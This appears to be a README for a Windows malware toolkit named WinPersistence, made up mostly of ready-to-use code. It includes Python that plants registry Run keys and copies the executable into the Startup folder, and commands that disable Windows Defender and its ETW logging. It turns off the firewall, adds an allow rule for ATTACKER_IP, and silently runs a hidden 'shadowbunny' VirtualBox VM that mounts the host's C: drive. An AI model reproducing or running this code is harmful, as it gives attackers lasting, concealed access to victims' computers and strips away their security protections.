└── README.md
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | WinPersistence
5 |
6 |
7 |
8 | ### Description
9 | Some of the techniques used in Malware Windows - Persistence(Registry HKCU,startup),Disable Windows Firewall,Disable Windows Defender
10 |
11 |
12 |
13 |
14 | ### Registry Key
15 | ```python
16 |
17 | def reg_windows():
18 | from os import system , environ
19 | malw_location = environ["appdata"]+"\\anyname.exe" # You can add any name to your Malware and any other path other than this
20 | system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d'+ malw_location +'"', shell=True)
21 | system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Evil /t REG_SZ /d'+ malw_location +'"', shell=True)
22 | system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Evil /t REG_SZ /d'+ malw_location +'"', shell=True)
23 | system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Evil /t REG_SZ /d'+ malw_location +'"', shell=True)
24 |
25 |
26 | ```
27 | ### StartUp
28 | ```python
29 | from os import environ , system
30 | from sys import executable
31 | from shutil import copyfile
32 | class Reg:
33 | def __init__(self):
34 | self.malw_location = environ["appdata"]+"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\anyname.exe"
35 | def startup(self):
36 | try:
37 | if not path.exists(self.malw_location):
38 | copyfile(executable, self.malw_location)
39 | except Exception as e:
40 | print(e)
41 | # and u can try add in registry
42 | from os import system , environ
43 | try:
44 | system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d'+ self.malw_location +'"', shell=True)
45 | except:
46 | self.malw_location = environ["appdata"]+"anyname.exe"
47 | system('reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Evil /t REG_SZ /d'+ self.malw_location +'"', shell=True)
48 |
49 |
50 | De3vil = Reg()
51 | De3vil.startup()
52 | ```
53 | ### Disable Windows Defender
54 | ```python
55 |
56 | def DisableWindowsDefender():
57 | import ctypes, sys
58 | import subprocess
59 | if ctypes.windll.shell32.IsUserAnAdmin() == 1: # 1 == True (admin ):: 0 == False
60 | subprocess.call("Set-MpPreference -DisableRealtimeMonitoring $true",shell=True)
61 | else:
62 | pass
63 | try:
64 | # Blind ETW Windows Defender: zero out registry values corresponding to its ETW sessions
65 | subprocess.call('reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f')
66 | # Disable Windows Defender Security Center
67 | subprocess.call('"reg add HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f"')
68 | # Disable Real Time Protection
69 | subprocess.call('reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f ')
70 | # or
71 | subprocess.call('reg add"HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f')
72 | # or
73 | subprocess.call('reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f')
74 | except Exception:
75 | pass
76 |
77 | ```
78 | > and u can Using task Scheduler -to Create a new task
79 | > You can do this using Python ``` python pip install apscheduler ```
80 | ### Disable Windows Firewall
81 |
82 | ```powershell
83 | Netsh Advfirewall show allprofiles
84 | NetSh Advfirewall set allprofiles state off
85 |
86 | # ip whitelisting
87 | New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
88 | ```
89 |
90 |
91 | ### Virtual Machines
92 |
93 | ```ps1
94 | # download virtualbox
95 | Invoke-WebRequest "https://download.virtualbox.org/virtualbox/6.1.8/VirtualBox-6.1.8-137981-Win.exe" -OutFile $env:TEMP\VirtualBox-6.1.8-137981-Win.exe
96 |
97 | # perform a silent install and avoid creating desktop and quick launch icons
98 | VirtualBox-6.0.14-133895-Win.exe --silent --ignore-reboot --msiparams VBOX_INSTALLDESKTOPSHORTCUT=0,VBOX_INSTALLQUICKLAUNCHSHORTCUT=0
99 |
100 | # in \Program Files\Oracle\VirtualBox\VBoxManage.exe
101 | # Disabling notifications
102 | .\VBoxManage.exe setextradata global GUI/SuppressMessages "all"
103 |
104 | # Download the Virtual machine disk
105 | Copy-Item \\smbserver\images\shadowbunny.vhd $env:USERPROFILE\VirtualBox\IT Recovery\shadowbunny.vhd
106 |
107 | # Create a new VM
108 | $vmname = "IT Recovery"
109 | .\VBoxManage.exe createvm --name $vmname --ostype "Ubuntu" --register
110 |
111 | # Add a network card in NAT mode
112 | .\VBoxManage.exe modifyvm $vmname --ioapic on # required for 64bit
113 | .\VBoxManage.exe modifyvm $vmname --memory 1024 --vram 128
114 | .\VBoxManage.exe modifyvm $vmname --nic1 nat
115 | .\VBoxManage.exe modifyvm $vmname --audio none
116 | .\VBoxManage.exe modifyvm $vmname --graphicscontroller vmsvga
117 | .\VBoxManage.exe modifyvm $vmname --description "Shadowbunny"
118 |
119 | # Mount the VHD file
120 | .\VBoxManage.exe storagectl $vmname -name "SATA Controller" -add sata
121 | .\VBoxManage.exe storageattach $vmname -comment "Shadowbunny Disk" -storagectl "SATA Controller" -type hdd -medium "$env:USERPROFILE\VirtualBox VMs\IT Recovery\shadowbunny.vhd" -port 0
122 |
123 | # Start the VM
124 | .\VBoxManage.exe startvm $vmname –type headless
125 |
126 |
127 | # optional - adding a shared folder
128 | # require: VirtualBox Guest Additions
129 | .\VBoxManage.exe sharedfolder add $vmname -name shadow_c -hostpath c:\ -automount
130 | # then mount the folder in the VM
131 | sudo mkdir /mnt/c
132 | sudo mount -t vboxsf shadow_c /mnt/c
133 | ```
134 |
135 |
--------------------------------------------------------------------------------